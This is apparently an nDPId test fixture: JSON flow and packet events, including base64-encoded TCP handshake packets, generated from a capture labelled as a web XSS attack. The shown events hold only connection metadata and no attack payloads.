+00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2292,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347115408,"flow_last_seen":1499347120644,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347242051,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53772,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2292,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347115408,"flow_last_seen":1499347120644,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347242051,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53772,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2295,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347243333,"flow_last_seen":1499347243333,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347243333,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55118,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2295,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":161,"flow_packet_id":1,"flow_last_seen":1499347243333,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347243333,"pkt":"ABm5CmnxAMGxFOsxCABFAAA87MZAAD4G2QmsEAABwKgKMtdOAFA1pxnaAAAAAKACchBBjgAAAgQFtAQCCAoBOfUcAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2296,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":161,"flow_packet_id":2,"flow_last_seen":1499347243333,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347243333,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ104lyvYYNacZ26AScSBcFAAAAgQFtAQCCAoD48aSATn1HAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2297,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":161,"flow_packet_id":3,"flow_last_seen":1499347243334,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347243334,"pkt":"ABm5CmnxAMGxFOsxCABFAAA07MdAAD4G2RCsEAABwKgKMtdOAFA1pxnbJcr2GYAQAOX7GwAAAQEICgE59RwD48aS"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2307,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347244580,"flow_last_seen":1499347244580,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347244580,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55132,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2307,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":162,"flow_packet_id":1,"flow_last_seen":1499347244580,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347244580,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8UrJAAD4Gcx6sEAABwKgKMtdcAFCKtaTmAAAAAKACchBgLQAAAgQFtAQCCAoBOfZUAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2308,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":162,"flow_packet_id":2,"flow_last_seen":1499347244580,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347244580,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ11yGUuJUirWk56AScSAstwAAAgQFtAQCCAoD48fKATn2VAEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2309,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":162,"flow_packet_id":3,"flow_last_seen":1499347244581,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347244581,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0UrNAAD4GcyWsEAABwKgKMtdcAFCKtaTnhlLiVYAQAOXLvgAAAQEICgE59lQD48fK"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2328,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347247114,"flow_last_seen":1499347247114,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347247114,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55158,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2328,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":163,"flow_packet_id":1,"flow_last_seen":1499347247114,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347247114,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8GLNAAD4GrR2sEAABwKgKMtd2AFApn+B+AAAAAKACchCDGAAAAgQFtAQCCAoBOfjNAAAAAAEDAwc="} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2329,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":163,"flow_packet_id":2,"flow_last_seen":1499347247114,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347247114,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ13ZCBl2jKZ\/gf6AScSAWJgAAAgQFtAQCCAoD48pEATn4zQEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2330,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":163,"flow_packet_id":3,"flow_last_seen":1499347247115,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347247115,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0GLRAAD4GrSSsEAABwKgKMtd2AFApn+B\/QgZdpIAQAOW1LAAAAQEICgE5+M4D48pE"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2337,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347248373,"flow_last_seen":1499347248373,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347248373,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55172,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2337,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":164,"flow_packet_id":1,"flow_last_seen":1499347248373,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347248373,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8JiRAAD4Gn6ysEAABwKgKMteEAFBjB9wsAAAAAKACchBMuQAAAgQFtAQCCAoBOfoIAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2338,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":164,"flow_packet_id":2,"flow_last_seen":1499347248373,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347248373,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ14RKuW9xYwfcLaAScSDECwAAAgQFtAQCCAoD48t+ATn6CAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2339,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":164,"flow_packet_id":3,"flow_last_seen":1499347248374,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347248374,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0JiVAAD4Gn7OsEAABwKgKMteEAFBjB9wtSrlvcoAQAOVjEgAAAQEICgE5+gkD48t+"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2349,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347249651,"flow_last_seen":1499347249651,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347249651,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55186,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2349,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":165,"flow_packet_id":1,"flow_last_seen":1499347249651,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347249651,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ostAAD4GIwWsEAABwKgKMteSAFAC31mDAAAAAKACchAuPQAAAgQFtAQCCAoBOftIAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":165,"flow_packet_id":2,"flow_last_seen":1499347249652,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347249652,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ15JGEK8pAt9ZhKAScSBpQAAAAgQFtAQCCAoD48y+ATn7SAEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2351,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":165,"flow_packet_id":3,"flow_last_seen":1499347249652,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347249652,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0osxAAD4GIwysEAABwKgKMteSAFAC31mERhCvKoAQAOUISAAAAQEICgE5+0gD48y+"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2367,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347252179,"flow_last_seen":1499347252179,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347252179,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55212,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2367,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":166,"flow_packet_id":1,"flow_last_seen":1499347252179,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347252179,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86Q5AAD4G3MGsEAABwKgKMtesAFDOJxTOAAAAAKACchClFwAAAgQFtAQCCAoBOf3AAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2368,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":166,"flow_packet_id":2,"flow_last_seen":1499347252179,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347252179,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ16ypaMjNzicUz6AScSBgpgAAAgQFtAQCCAoD4882ATn9wAEDAwc="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2369,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":166,"flow_packet_id":3,"flow_last_seen":1499347252180,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347252180,"pkt":"ABm5CmnxAMGxFOsxCABFAAA06Q9AAD4G3MisEAABwKgKMtesAFDOJxTPqWjIzoAQAOX\/rQAAAQEICgE5\/cAD4882"} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2376,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347116705,"flow_last_seen":1499347122644,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347252685,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53786,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2376,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347116705,"flow_last_seen":1499347122644,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347252685,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53786,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2376,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347119336,"flow_last_seen":1499347124645,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347252685,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53812,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2376,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347119336,"flow_last_seen":1499347124645,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347252685,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53812,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2376,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347120603,"flow_last_seen":1499347125645,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347252685,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53826,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2376,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347120603,"flow_last_seen":1499347125645,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347252685,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53826,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2376,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347123174,"flow_last_seen":1499347128646,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347252685,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53852,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2376,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347123174,"flow_last_seen":1499347128646,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347252685,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53852,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2376,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347124454,"flow_last_seen":1499347129648,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347252685,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53866,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2376,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347124454,"flow_last_seen":1499347129648,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347252685,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53866,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2376,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347125743,"flow_last_seen":1499347131649,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347252685,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53880,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2376,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347125743,"flow_last_seen":1499347131649,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347252685,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53880,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2379,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347253445,"flow_last_seen":1499347253445,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347253445,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55226,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2379,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":167,"flow_packet_id":1,"flow_last_seen":1499347253445,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347253445,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8uoZAAD4GC0qsEAABwKgKMte6AFBXtER6AAAAAKACchDqlAAAAgQFtAQCCAoBOf78AAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":167,"flow_packet_id":2,"flow_last_seen":1499347253445,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347253445,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ17p5Tes0V7REe6AScSCymwAAAgQFtAQCCAoD49ByATn+\/AEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2381,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":167,"flow_packet_id":3,"flow_last_seen":1499347253445,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347253445,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0uodAAD4GC1GsEAABwKgKMte6AFBXtER7eU3rNYAQAOVRowAAAQEICgE5\/vwD49By"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2394,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347254714,"flow_last_seen":1499347254714,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347254714,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55240,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2394,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":168,"flow_packet_id":1,"flow_last_seen":1499347254714,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347254714,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8sPBAAD4GFOCsEAABwKgKMtfIAFAvObDJAAAAAKACchCldQAAAgQFtAQCCAoBOgA5AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2395,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":168,"flow_packet_id":2,"flow_last_seen":1499347254714,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347254714,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ18hpS4YpLzmwyqAScSDhSwAAAgQFtAQCCAoD49GwAToAOQEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2396,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":168,"flow_packet_id":3,"flow_last_seen":1499347254715,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347254715,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0sPFAAD4GFOesEAABwKgKMtfIAFAvObDKaUuGKoAQAOWAUgAAAQEICgE6ADoD49Gw"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2410,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347257224,"flow_last_seen":1499347257224,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347257224,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55266,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 